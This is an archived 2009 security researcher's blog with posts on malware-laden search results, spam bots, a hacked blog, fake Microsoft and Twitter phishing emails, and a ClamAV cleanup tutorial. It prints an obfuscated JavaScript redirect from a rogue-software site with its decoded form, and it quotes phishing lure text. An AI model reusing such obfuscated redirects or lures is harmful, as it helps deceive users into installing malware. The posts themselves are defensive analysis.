Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 28 June 2009

Full Circle Magazine: Issue 26!

Along with a long-promised site redesign, this month, we’ve got some more FCM goodness in store for you readers.

This month:

- Command and Conquer – MOC & IRSSI
- How To: Ubuntu As A Guest, Apt-Cacher, and Inkscape – Part 3.
- My Story – Why I Converted To Linux.
- Review – WebHTTrack
- MOTU Interview – Stefan Ebner.
- Top 5 – Linux-powered Devices.
- Ubuntu Women, Ubuntu Games, and all the usual goodness!

Read more

Get it while it's hot!

Issues 0 - Current



Saturday, 27 June 2009

Google serving Michael Jackson related malware

It should come as no surprise that when a tragedy happens, the criminals online, are immediately looking for ways to exploit such. The tragedy of Michaels passing is no different.

I was keeping an eye on Google for the last 48 or so hours to see what would come up, and there's literally a plethora of malware infections waiting for you. For example, lets take the following, which claims;

Michael Jackson (Death Photo) - Vox
26 Jun 2009 ... Blog 15 just almost body Southern Michael Jackson short final Email above ... music Site top Michael dominates Michael Hoax once his -- earlier to buried ... Lombard (Farrah Fawcett Playboy Video)Michael Jackson (Death ... - 17 hours ago

Loading the site shows us that (surprise surprise) it claims to be a video, and tries to make us believe the video has been posted by a real person;

Not surprisingly, if you click on this video, you're taken to a fake AV (vURL Results:;




4. (85K - ac0743191768749085e7806810a7efd4)

Sadly, detection for this particular variant is seriously lacking, with VT showing only 2 vendors detecting it;

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.34
Date: Sat, 27 Jun 2009 20:11:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Content-Length: 0

HTTP/1.1 302 Found
Date: Sat, 27 Jun 2009 20:11:42 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: schema1=true; expires=Sat, 04-Jul-2009 20:11:42 GMT
Set-Cookie: visited1=5; expires=Sat, 04-Jul-2009 20:11:42 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

HTTP/1.1 200 OK
Date: Sat, 27 Jun 2009 20:11:39 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=a3c13dc8d583c237792077cd1c8639c8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

What is surprising, is that alot of those I checked (especially the * sites), pointed to sites that had already been shut down.

Either way, this is going to get worse as the days go on, and it should be noted, it's not only search terms associated with Michael Jackson or Farrah Fawcet that are affected - these malicious links are in almost ALL results, irrespective of search terms (start at the last page of the results, that's where they tend to lie).

Be careful out there folks, and ensure you're surfing with ActiveX DISABLED (and unless the site absolutely requires it, scripts should be disabled too, aswell as META REFRESH).


ThreatExpert report for the variant mentioned above.

Michael Jackson condolences book (Michael Jackson World Network), have opened a condolences book for those of us that would like to pass on your condolences.

Friday, 26 June 2009

Portable Ubuntu: Got some server space and bandwidth to spare?

I'd completely forgot about the Portable Ubuntu project until I was researching the reason for the Ubuntu counter being offline again (last went down late last year). Looking through their forums shows they are currently in need of volunteers willing to give up over 600MB (the size of the latest portable version apparently) of space on their server, and of course, the bandwidth to go with it;

Portable Ubuntu is a fantastic choice for Windows users wanting to try out Ubuntu, but don't want the hassle of burning ISO's, or using Wubi etc, as you can just download and run it as you would any other Windows application.

You can find their homepage at;

And a review of it at;

If you've got some space and bandwidth to spare for a wonderfully useful Linux project, please do get in touch with them.

When is a spam/bot filter not enough?

When it's not effective enough of course!.

Spam and bot filters have one major flaw, and it's the same flaw that other security related products have - they rely on lists/databases of known offenders. It's great when the offender is in one of the databases, as it means they're instantly blocked, but with the growing trend over the last several years, of criminals hiring out their botnets to spamming gangs (when they aren't doing the spamming themselves of course), these filters have proven to be simply a stop gap - otherwise known as effective until they come along with an IP/e-mail not known to the blacklists.

Take for example,, who are by far the most prolific spammers visiting the Freeware Arena forums. The latest IP they used was, which you'd have thought, given it's network, China Unicom Beijing province network, would already be on all of the major blacklists - but alas no, it turns out the IP used, wasn't on any of them.

There are of course, additions you could use, such as Akismet, but experience has shown, incorporating that into custom sites, non-supported CMS systems is a pain. It does however, beg the question - since it's been shown that blacklists and other such filters, are only partially effective, even Akismet doesn't catch it all, what other options are there for us?

One idea I've been pondering, is a heuristic filter, but at present, I'd have no idea how to design such a beast, let alone begin writing one. I'm therefor going to put the question to you - other than blacklists, how do you propose we all go about fighting spam (given most machines serving spam now, are actually drones that are part of a botnet, rather than your average skiddie running XRumer)?

Thursday, 25 June 2009

RIP Michael Jackson: 29.08.1958 - 25.06.2009

I've been a fan of Michael Jackson for well over 20 years, and am extremely saddened to hear of his passing. He was without a doubt, the best entertainer in the world, bar none, and will continue to be for years to come. His music transcended race, gender and pretty much everything else.

Rather than go on about how much of an impression he made on me, and how much I have loved, and indeed, still love his music, I will instead put out a warning.

We all know, when something tragic happens, the bad guys go all out to take as much advantage as they can. Given how well known Michael was, and how many fans he has world wide, it will come as no surprise that they're going to try and take advantage of this situation.

Rather than repeat what has been written, I'll point you to the Eset blog instead;

RIP Michael. I've been a fan of yours for most of my life, and will continue to be for many more years to come.

Foreign Policy Blog network hacked

I came across a rather strange referral to hpHosts earlier - strange because it was coming from, a site that has absolutely no reason to refer to the hpHosts website.

I loaded the site up, and did a search for the word "hphosts", and sure enough, it was highlighted. If we look at the source code for the site, and so far, it only appears to be the defense. that is affected by this, we see alot of extra code and links, all pointing to; resolves to, which is on the Beltelecom network (AS6697), and is also the same IP that (amongst others) is hosted at.

Given that is still using a very old version of WordPress with known vulnerabilities (according to the source code, they're still using 2.7.1), I think it's pretty safe to say how they were able to get in, when of course this happened, is a different matter (I've not been able to find anything on the many hacker/skiddie forums referencing the site). I'm trying to get in touch with them to get them both cleaned up, and upgraded, I'll report back if I'm successful (and get the ISC involved if I'm not).

As for, nothing new there I'm afraid, it's your typical OEM software scam site.

WhoIs details:

Boris Hinstein
Kalinina str 3-15
Minsk, Minsk 220124

Registered through:, Inc. (
Created on: 19-Sep-02
Expires on: 19-Sep-09
Last Updated on: 26-Sep-08

Administrative Contact:
Hinstein, Boris
Kalinina str 3-15
Minsk, Minsk 220124
375297504299 Fax --

Technical Contact:
Hinstein, Boris
Kalinina str 3-15
Minsk, Minsk 220124
375297504299 Fax --

Domain servers in listed order:

Net-block details:

WhoIs details:

inetnum: -
country: BY
admin-c: DK2210-RIPE
tech-c: IS2093-RIPE
mnt-by: AS6697-MNT
remarks: INFRA-AW
source: RIPE # Filtered

person: Dmitry Komarov
address: 220088, Minsk
address: 55, Zaharova str.,
address: RUE Beltelecom
phone: +375 17 2171799
fax-no: +375 17 2100259
nic-hdl: DK2210-RIPE
mnt-by: AS6697-MNT
source: RIPE # Filtered

person: Ivan Semernik
address: 220088, Minsk
address: 55, Zaharova str.,
address: RUE Beltelecom
phone: +375 17 2171799
fax-no: +375 17 2100259
nic-hdl: IS2093-RIPE
mnt-by: AS6697-MNT
source: RIPE # Filtered

% Information related to ''

origin: AS6697
mnt-by: AS6697-MNT
source: RIPE # Filtered

AS28840 involved in spambot activity

No surprises here I'm afraid, AS28840 is a russian outfit known as "OAO TATTELECOM" (, with the routes (amongst others);

A little basic research shows the IP that sent me the spam, which I'll get to in a second as it is rather funny, is known to ProjectHoneyPot and flagged by them as "Suspicious";

Given the information at PHP, it looks like a mail server, and I find it very difficult to believe that it's a compromised one, especially given it's location (perhaps I'm being too suspicious there? time will tell), and one or two of the other IP blocks owned by this company, has also been involved in malicious activity.

What is rather strange, is that other than the ProjectHoneyPot entry, I couldn't identify any other information referencing as being malicious, though I easily found several references to other net blocks owned by this AS in various places such as,

So what of the e-mail itself? Well in this case, though boring as the tracks stop there, the linky in the e-mail is to - Google (Outlook stripped the HTML, so presumably it didn't originally - one of these days Outlook will actually take notice of the options I've got set).

And yep, the headers are childs play to interpret too, one single fake "From" line, and that's it.

Delivered-To: [REMOVED]
X-FDA: 62387961720
X-Panda: scanned!
X-Filterd-Recvd-Size: 2294
Received: from (unknown [])
by (Postfix) with ESMTP
for <[REMOVED]>; Thu, 25 Jun 2009 17:52:58 +0000 (UTC)
Received: from by; Thu, 25 Jun 2009 20:52:58 +0300 <---FAKE
From: "Joaquin Haney" <>
Subject: About Us
Date: Thu, 25 Jun 2009 20:52:58 +0300
MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Thread-Index: Aca6QC14UYO5I7KFTGN0RMR9IYT63Z==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2663
Message-ID: <01c9f5d6$eb861810$b3aa8a4e@iydc>
X-EsetId: 81896726F0AC3331D7CD


hpHosts -

Wednesday, 24 June 2009

Using the ClamAV LiveCD to clean an infected Windows machine

Should you ever get into a situation that finds your computer unable to boot to the desktop due to an infection, or the system boots fine, but doesn't get to the desktop, what do you do? Well, typically, your options are;

1. Format and re-install Windows
2. Remove the hard drive and pop it into a secondary machine as a slave
3. Use a Linux LiveCD to boot and clean the machine

The first option is obviously, not viable for most people as you'd want to backup your documents and such. The second, again, is not viable for most people as not everyone has a secondary machine.

The last option however, is very simple, and can be used by everyone. To save yourself downloading a large file, you can download a much smaller LiveCD specifically for this task, in the form of the ClamAV Live CD by Brandon Perry;

Whilst rather old, this can be updated to use the latest definitions, and we'll go through this in a second. The first thing you need to do once you've downloaded the ISO, is burn it to a CD - I personally suggest ISORecorder for this;

The first screen you will see when booting the CD, is the introduction, for this, simply type clamav and press enter. You'll need to wait a few minutes for it to load, but once loaded you'll be at the command prompt;


Type sudo apt-get update and press return. Again, you'll need to wait a couple of minutes, but once it's finished, you'll be back at the prompt. Next we need to update the ClamAV signatures, to do this, type sudo freshclam and press return.

Next, we need to mount the drive containing your Windows installation. Type each of the following commands, pressing return after each of course.

cd /home
sudo mkdir mnt
sudo mount -t ntfs-3g /dev/sda1 ./mnt

Finally, we need to run the scan (note this will take some time, so grab a coffee, watch a movie, take the dog for a walk or ... you get the idea), to do this, type the following and press return;

clamscan -i -r --remove ./mnt

Note: The authors tutorial for this LiveCD is available in English, German or Polish at, his blog also documents a script you can use (on Linux obviously, no such beast yet exists for Windows) to update the LiveCD .ISO automagically via cron

As an aside, I do actually generally recommend people surf the internet using a Linux LiveCD anyway as it makes it much harder to infect your Windows system (there is malware out there for Linux, make no mistake, but no-where near as much as there is for Linux, due mainly to Windows popularity). You don't even need to boot the system with the CD, you can use MobaLiveCD instead (though bear in mind, this is MUCH slower, and tends to require ALOT of RAM, and tends to hate trying to run large (over 150MB) ISO's (I've had the most success with it, using DamnSmallLinux).

Tuesday, 23 June 2009

Notifiication of possible downtime

You may have noticed the network was down earlier, sadly this notification didn't come through until after I'd got it back online again, so I wasn't aware PlusNet were doing any work.

The following therefor, is a notice that there may be additional downtime for the,, sites whilst they carry out the work referenced;

Monday, 22 June 2009

Essential Maintenance: hpHosts server

Just a note folks, the hpHosts server is going offline in approx 2 minutes time for essential maintenance. Please accept my apologies for the disruption. It will be back online within 30-45 mins.

/edit 06:40

She's back folks (she was in dire need of cleaning and replenishment of the coolant gel). Apologies again for the inconvenience.

On the subject of blog spam ......

.... though technically not blog spam, one of the sites I look after, had the following submitted to the guestbook (good thing I wrote a filter for it huh?) a few minutes ago;

Reason for message: BLACKLISTED USER guestbook submission notification
Server address: [REMOVED]
Referring page: [REMOVED]
Date submitted: 23 June 2009
Time submitted: 02:08:04
Submitted by: Helen < >
Posters IP:
Name: Helen
Private?: False

that bring bloodthe blood are open.
<a>order viagra here<a>state the penis isarteries going toblood can enter the[]order viagra online[url]then gets trapped inelongates and

Incase you're wondering, our dear spammer is apparently coming from (apparently a US based ISP - never heard of them myself).

You're probably wondering;

1. Why I am writing about this
2. Why I didn't have it block anything with A HREF or BBCode

Well, to answer #1, I thought it was funny, especially given this particular spam doesn't lead to a YouTube video, which I was actually expecting - but leads to a profile that links to (IP:, registered to Nexton Limited in the Ukraine, and hosted by MoskvaCom Ltd in Russia (AS2118), who also host (IP:

Our dear spammer however, is also known for something a little worse than meds spam - rogue crapware. Looking at ProjectHoneyPot shows references to a fake WordPress blog (I say fake because I've got a few other sites listed that are hosted on the same IP block) at Looking at the source code, shows a reference to a .JS file;

vURL Online -

This returns some rather interesting code;

var str=["336", "333", "332", "332", "332", "441", "420", "437", "355", "435", "434", "441", "384", "371", "382", "336", "333", "332", "332", "332", "425","440", "433", "422", "439", "428", "434", "433", "355", "434", "420", "420", "442", "426", "424", "434", "440", "437", "444", "444", "441", "440", "363","436", "440", "424", "437", "444", "364", "446", "336", "333", "332", "332", "332", "332", "442", "428", "433", "423", "434", "442", "369", "431", "434", "422", "420", "439", "428", "434", "433", "384", "362", "427", "439", "439", "435", "381", "370", "370", "434", "433", "431", "428", "433", "424", "425", "440", "437", "433", "428", "439", "440", "437", "424", "375", "440", "369", "428", "433", "425", "434", "370", "438", "440", "439", "437", "420", "370", "428", "433", "369", "422", "426", "428", "386", "373", "371", "361", "435", "420", "437", "420", "432", "424", "439", "424", "437", "384", "362", "355", "366", "355", "436", "440", "424", "437", "444", "355", "366", "355", "362", "361", "440", "437", "384", "372", "361", "395", "407", "407", "403", "418", "405", "392", "393", "392", "405", "392", "405", "384", "438", "434", "425", "439", "442", "420", "437", "424", "438", "439", "434", "437", "444", "418", "426","420", "432", "424", "438", "362", "382", "336", "333", "332", "332", "332", "448"];

var temp='';
var gg='';
for (i=0; i<str.length; i++){

If we decode this, we see;

var pov=0;
function oaawgeouryyvu(query){
window.location='¶meter=' + query + '&ur=1&HTTP_REFERER=softwarestory_games';

If we remove ' + query + ', we see it redirects us to;

To answer #2, I don't get anywhere near as many infected or spammy e-mails as I used to, so I've got to try and keep some of my fun.


Spambot Search Tool - /

hpHosts -

hpHosts -

Spambot Search Tool: One or two notables

This is just a follow up concerning the latest release of the SBST. Unfortunately I completely forgot to mention a couple of things concerning the latest release. Firstly, if a match is found in one of the databases when using check_spammers_plain.php, it will NOT check the rest of the databases as I didn't see there was really much point (it also speeds up the script).

Secondly, and thanks to Derek for reminding me, although I mentioned $CheckFSL and $CheckSFS being changed, I forgot to mention that you will need to update these variables in your config.php if you're already using the SBST. If you do not change these to $bCheckSFS and $bCheckFSL respectively, the SBST will NOT check either fSpamlist or StopForumSpam.

hpHosts - UPDATED June 22nd, 2009

hpHOSTS - UPDATED June 22nd, 2009

The hpHOSTS Hosts file has been updated. There is now a total of [b]67,514[/b] listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 22/06/2009 19:18
  2. Last Verified: 22/06/2009 17:00
Download hpHosts now!

Alas as a side note, the current version of PGP I've got doesn't seem to have a "just sign the damn thing" option, so it seems to be signing the file, but including a copy of the file in the signature - hence the larger file sizes. I've been right through the documentation and can't find an option to get it not to do this. The trial version expires in 4 days anyway though so I'm going to see if I can dig out the previous version I was using.

Friday, 19 June 2009

FAIL: "Microsoft has released an update for Microsoft Outlook"

There's been a whole host of these recently, so this one is nothing new - except that in this case, only 1 out of those he's seen, actually resolves.

Incase it was just a case of his DNS server not having the IP's yet, I ran the hostnames he listed through hpObserver, and the results showed exactly the same thing. In this case, the one that does resolve, is quite obviously a part of a botnet, and not surprisingly, consists mainly of home DSL lines by the looks of it.

hpObserver results are at;

This email looks like it's from Microsoft, but it is really intended to load a trojan onto your PC:
From: Microsoft Customer Support []
Sent: 18 June 2009 22:47
Subject: Microsoft has released an update for Microsoft Outlook

Critical Update

Update for Microsoft Outlook / Outlook Express (KB910721)
Brief Description
Microsoft has released an update for Microsoft Outlook / Outlook Express. This update is critical and provides you with the latest version of the Microsoft Outlook / Outlook Express and offers the highest levels of stability and security.
• To install Update for Microsoft Outlook / Outlook Express (KB910721) please visit Microsoft Update Center:[redacted]
Quick Details
• File Name: officexp-KB910721-FullFile-ENU.exe
• Version: 1.4
• Date Published: Thu, 18 Jun 2009 16:46:55 -0500
• Language: English
• File Size: 81 KB
System Requirements
• Supported Operating Systems: Windows 2000; Windows 98; Windows ME; Windows NT; Windows Server 2003; Windows XP; Windows Vista
• This update applies to the following product: Microsoft Outlook / Outlook Express
Contact Us
© 2009 Microsoft Corporation. All rights reserved. Contact Us |Terms of Use |Trademarks |Privacy Statement

Read more

Thursday, 18 June 2009

vURL Online: Bug fixes and problems

Oh the joys ..... you spend ages writing code, functions for that code, testing, re-testing, re-writing, re-testing again - and all goes perfectly. Then out of the blue, problems that weren't there before, suddenly start appearing as if out of nowhere.

This is what seems to have happened lately to the vURL Online service - several issues have arisen that weren't there previously (or if they were, they didn't show up during testing).

I've now fixed the following issues, and would appreciate your pointing me to anymore that you notice;

1. PhishTank returns Bad Request instead of result

This one seems to be sporadic, and I know the cause for this - PhishTank wants the URL not only Base64 encoded, but also URL encoded in cases where the URL contains an "=" - which is fair enough. However, sometimes it is returning a Bad Request error even when the URL is properly formatted.

I think I've fixed this (have tested since, and not noticed it re-appearing), but let me know if you notice the PT results saying Bad Request, instead of Listed or Not Listed.

2. hpHosts announcing a host was listed, when infact it was actually only listed with the www. prefix

This was actually a pretty easy fix as it wasn't a problem with vURL itself, but with the fuzzy matching I was having the hpHosts query perform. I've disabled fuzzy and partial matching, so it will only return true if the domain itself is listed, and not if the domain is listed but ONLY with the "www." prefix.

3. Headers and body not properly split from each other

Again, this is due to the functions I had it perform. I've re-written the function so it now properly splits the headers from the actual source code (this is actually having to be done because I can't seem to find a method to have cURL enclose the headers in "[HEADERS]", seperate from the body as the proxy script returns both in the same result (I could have it perform two requests so they're obtained seperately, but I'm trying to have as little overhead as possible to speed things up).

4. Links not properly detected and returned

The function I wrote for this was actually working perfectly, what was actually happening is that these results were not then being passed back to the main processor for formatting and display. I've no idea what has caused this, and have spent over 3-4 hours scouring the code, but have had to write a work-around instead.

5. User Agent selection

This was not actually a bug, just missing UA's in the UA dropdown list. I've now added a few more to it, namely, MAC (Safari) UA's.

Check out vURL Online at:

vURL currently uses an MDB to store the URL's and such being requested, due to the size of the current DB, this is going to be changed to MySQL in the coming months (or when I get around to it - MySQL isn't currently installed on the vURL server, so I'll have to do that, then configure it, then re-write the vURL site to use MySQL instead of MDB).

Nine Ball: Juggling with VirusTotal

There’s been some media interest in an alert from WebSense about something they call Nine Ball (he, said, trying to keep his sense of humour in check). It has some pretty interesting characteristics. I’d like to pick up, though, one point that the reports I’ve seen have rather overstated.

WebSense mentioned that vendor detection is low on a Trojan Loader and a malicious PDF. This is true, or was at one point in time, in the sense that a PDF sample submitted to VirusTotal resulted in a report indicating that only three vendors identified it as malicious. Well, actually, even that isn’t quite accurate: two of those hits seem to be a generic packer/javascript detections rather than identification of the file as malicious in its own right. (Similarly, most of the Trojan Downloader detections are generic, and one simply says "suspicious".)

This industry is divided on whether detection purely on packer signature is a good idea. Some vendors flag almost all packed malware as malicious, packed or suspicious: this is because malware distributors use packers, obfuscators and protectors to make it more difficult for security software to recognize code that would otherwise be identified as known malicious code.

The problem is that a fair number of developers use the same tools (in some cases tools specifically developed for malicious purposes) to protect legitimate applications from disassembly and so on, as a Digital Rights Management (DRM) strategy. Well, that’s what they tell us. For this reason, some vendors don’t automatically detect packed apps as malicious, for the benefit of those to whom avoiding false positives may be as important as high detection rates. (Strangely enough, some organizations find FPs a very signific;ant problem. Of course, all companies do if an innocent and widely used file such as a Windows system file is misidentified as malicious.)

Note, however, that high detection rates and low false positive rates aren’t mutually incompatible. Products that don’t generally detect packers as automatically malicious (we don’t, with some exceptions) may well detect packed code anyway, using custom unpackers and other techniques such as emulation. So where’s the problem with VirusTotal? Well actually, the problem isn’t with VirusTotal (or rather with Hispasec, who provide the free VirusTotal service), but with the way that it’s used.

Additional references:

Opera users beware!

I read about this a couple of days or so ago, and am glad I'm not the only one that thinks is a really bad decision on Opera's part. Browsers should NEVER EVER EVER EVER have a server built into them!

Botnet owners unite!

Opera has introduced a new feature called “Unite” that will allow users to turn their browsers into servers. It’s a concept that might be as well-thought-out as sending customers on a hike in a safari park with backpacks full of raw meat.

According to the Opera Unite Developer’s Primer, “Opera Unite features a Web server running inside the Opera browser, which allows you to do some amazing things.” We’re betting there some other people who use the Internet who will be doing some amazing things with this too.

Unite is basically a group of extensions to the Opera Web browser widget system. They will make it possible for Opera users to set their machines up as servers to provide their friends with blogs or access to files. Opera’s servers will serve up pages for the “Turbo” feature and act as proxies (with firewall) for the communication between the users’ Unite-linked browsers. Opera staff will check for bugs and malcode. Adult material is not allowed.

The most significant question that arises is: Will users accidentally give unintended access to their file systems? Opera programs are really widgets. Shortcuts have been provided for configuring what they can access. Some shortcuts lead to system folders. There are warnings included in the documentation, but, ultimately what is exposed is left to the developer

Wednesday, 17 June 2009

25th Anniversary - Congrats Kev!

I am extremely happy to announce the 25th anniversary of one of my favourite comedians (it's not his fault he's Australian ;o)), Kevin 'bloody' Wilson. I'll not post the e-mail I received from them about this (had to send a small rant as the link they sent me to the site, was not a link to the domain - but a TinyURL err, URL - Short URL's should NEVER be used in e-mails - ever! (and yes, that includes sURL)), instead, I'll just post a link to the 'Jenny Talia' site instead. - Video of the week - Congratulations dad!

Note: if you've got scripts + ActiveX enabled, be warned, she's embedded the YouTube video in her blog (GRRRR!)

I don't need to mention, those of you familiar with Kev and Jenny, will already know not to have the kids about when you view this - it's 18+ only folks! (nope, no pornographic pictures - just think Billy Connolly with alot of extra lewdness!)

Kev's own site can be found at;

Not sure who he is? Go read about him;

His online radio is here;

FireEye: Killing the beast .... Part II

These articles were published back in December 2008 but most of the details are still valid for the newer versions.

Back to the CnC structure ... Koobface relies mostly on domain names to locate its CnC servers, instead of using hard coded IPs like Pushdo. As a matter of fact, I observed that it tends to change its CnC domains more often than the IPs behind those domains change. Based on my lab data (for the last 3 months or so) I see Koobface connecting to 23 unique domains.

Here is the complete list:

Surprisingly, when I count the collective IPs behind all these domains, I hardly find 4 unique IPs. Multiple domains have been resolving to these fixed IPs over the period I examined.

Read more

Malware: Your friend invited you to Twitter!

I don't use Twitter myself, don't have a need for it, so was surprised to see the following arrive in my inbox as it instantly aroused my suspicion - Twitter have no need to e-mail me, and certainly have no need to send me any files.

Alas as you've probably guessed, and I already knew, it wasn't from Twitter. This one is from some jackass ( - that obviously doesn't know enough about trying to infect people, to either change icons, use a packer, or even try a bit harder to hide the real file type - they just tried disguising it using "document.chm{lots of spaces}.exe" - childs play stuff (little note my dear malware guy, this doesn't really work when you've sent in a zip file - the zip shows the real extension without my having to look for it).

Exported by: Outlook Export v0.1.6

From: [ - Resolution failed ]
Date: 17/06/2009 16:49:09
Subject: Your friend invited you to twitter!

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Listed
MDL Status: Not Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

IP: [ ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

IP: [ ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Unknown

IP: [ ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Listed
PhishTank Status: Unknown

Text Version
* Skip past navigation
* On a mobile phone? Check out <> !
* Skip to navigation
* Skip to sign in form

Select Language ... English Japanese <>

Your friend invited you to twitter!

Your friend invited you to twitter!<>

Twitter is a service for friends, family, and co-workers to communicate and stay connected through the exchange of quick, frequent answers to one simple question: What are you doing?

To join or to see who invited you, check the attachment.


Arrow_on_red Watch a video! <>

Please sign in

user name or email address:


Remember me

Forgot password? Click here <> .

Already using Twitter from your phone? Click here. <>



Twitter is the first thing on the web that I've been excited about in ages.

Jason Kottke, Blogger

I really like Twitter.

Jeff Barr,, Senior Manager

Incredibly useful




* 2009 Twitter
* About Us <>
* Contact <>
* Blog <>
* Status <>
* Apps <>
* API <>
* Search <>
* Help <>
* Jobs <>
* Terms <>
* Privacy <>


Delivered-To: {REMOVED}
X-FDA: 62358624678
X-Panda: scanned!
X-Filterd-Recvd-Size: 428259
Received: from ( [])
by (Postfix) with ESMTP
for <{REMOVED}>; Wed, 17 Jun 2009 15:51:05 +0000 (UTC)
Subject: Your friend invited you to twitter!
Date: Wed, 17 Jun 2009 09:49:09 -0600
MIME-Version: 1.0
Content-Type: multipart/mixed;
X-Priority: 3
X-MSMail-Priority: Normal
X-EsetId: 81896726F0AC3330DBCF

Oh and yep, detection for it is rubbish;


I've not looked at this yet as it's only just arrived, but here's the TE report for you (JoeBox couldn't analyze it, and my test machine isn't back up yet - still in pieces);

Monday, 15 June 2009

Pastebin Botnets

I've always been interested in Botnet research, and a piece of code in circulation on forums at the moment seemed interesting enough to write about. The subject is "Pastebin Botnets", but first we'd better talk a little bit about Pastebins...

Pastebins - what are they?

From Wikipedia:

A pastebin, also known as a nopaste, is a web application which allows its users to upload snippets of text, usually samples of source code, for public viewing. It is very popular in IRC channels where pasting large amounts of text is considered bad etiquette. A vast number of pastebins exist on the Internet, suiting a number of different needs and provided features tailored towards the crowd they focus on most.

Pastebins have become very popular in certain hacking communities, where quick and easy sharing of a targets personal information ("Dox") is perfectly at home in the world of pastebins.

Read more

Saturday, 13 June 2009

Spambot Search Tool v0.32

Date: 13-06-2009

+ Added function GetSpammerCount
* Modified index.php so it uses GetSpammerCount to obtain the spammer count from the DB if $bln_SaveToDB is enabled, and counter.txt if it isn't.
* Modified spammer list output when viewing e-mail reports
* Modified IMAP code so e-mails are sorted by date order
* Modified spammer list output and display when viewing text/MySQL records
* Fixed form (index.php) display on Opera

I am working on adding a caching facility, and of course, pagination (for the viewing reports pages). The latter is currently being a PITA at present (pagination + IMAP seems to = annoyance)

Tuesday, 9 June 2009

In the UK? Own a mobile? You NEED to read this!

Did you know your operator sold your number to marketing firms, who then sold it to this outfit?

Millions opted into UK mobile phone directory

A public mobile phone directory for the UK will launch later this month, loaded with millions of private numbers bought from marketing departments.

From June 18, callers to 118800 will be asked for a first name, a surname and a town*. If a match is found, they will be connected to that person's mobile for £1.

Connectivity, the start-up firm behind the service, says it will never give out numbers or other personal details, and will ask the recipient's permission before connecting the call. It also promises in its FAQ not to sell or pass data to commercial organisations, and to monitor its directory for any suspicious usage patterns.

The firm is coy about how it built its list of "many millions" of mobile numbers. "Our mobile phone directory is made up from various sources," Connectivity wrote.

"Generally it comes from companies who collect mobile telephone numbers from customers in the course of doing business and have been given permission by the customers to share those numbers."


Data watchdog clears mobile phone directory - You agreed for your details to be used like this, right?


There is a freephone number for those that want to opt out apparently, but it takes up to 4 weeks;

0800 138 6263

Yet another SPAM Bot

Today while I was casually going through my sandnet logs, one malware outbound communication suddenly caught my attention. This communication certainly looked like a SPAM template download. Unlike other famous botnets like Cutwail, Rustock, Tofsee, Srizbi, Xarvester, etc, the spam template was in plain text and all the artifacts were clearly visible.

This first question in my mind was to find the name of this SPAM bot. A virustotal report could help, but in this case, it confused me further.

See it for yourself:


My next attempt was to search for some information based on the command and control name ''. But no luck..

I had no choice but to start my investigation from point zero. Here are some of my findings:


I'm not sure.

Infection Vector:

The name of the malware binary file (as it reached me) was e-card.exe. It's not difficult to understand that this might be the outcome of yet another social engineering based mail campaign which lures users to click on fake greeting cards link.


No real attempt was made by this malware instance to hide itself deeply on the infected system. Upon execution, this malware copies itself under %WINDOWS%/SYSTEM with the name of 'winlogon.exe', and further adds itself under


so that it will start on every system start up.


It's another template based SPAM bot like all the major players. This SPAM template was divided into different logical sections which I'll explain one by one:

Monday, 8 June 2009

FireEye: Ransom - Pay me more - Part II

Ransom - Pay me more - Part II

I recently got an important clue, how this ransom deal takes place between a victim and these cyber criminals. One of reader who became victim of this ransomeware dropped an email to this ransom guy at the address for his files recovery. This was the response by that guy:

"Transfer into account pay pal 50 dollars here email pay pal'

Interestingly, instead of asking him standard $10 ransom (as mentioned in his earlier message) he asked him for $50, typical criminal mentality, isn't it? Unfortunately his greed doesn't end here. This malware instance came bundled in a fake 'SWF video codec' file. Upon execution this setup file installs three different malware on the victim machine including this ransomware.

1. 5f9927ee59b4881a2ce8634332f63fa8

Trojan Encoder, the one that encrypts the user file and asks for ransom in return.

2. 010d7b79d002d747f420a7880f89ee38

A password stealing Trojan that uploads user personal information on a remote command and control server ( using obfuscated protocol on TCP port 3460.


Read more

Sunday, 7 June 2009

Roguerific! aka: Don't worry Google, we can wait ....

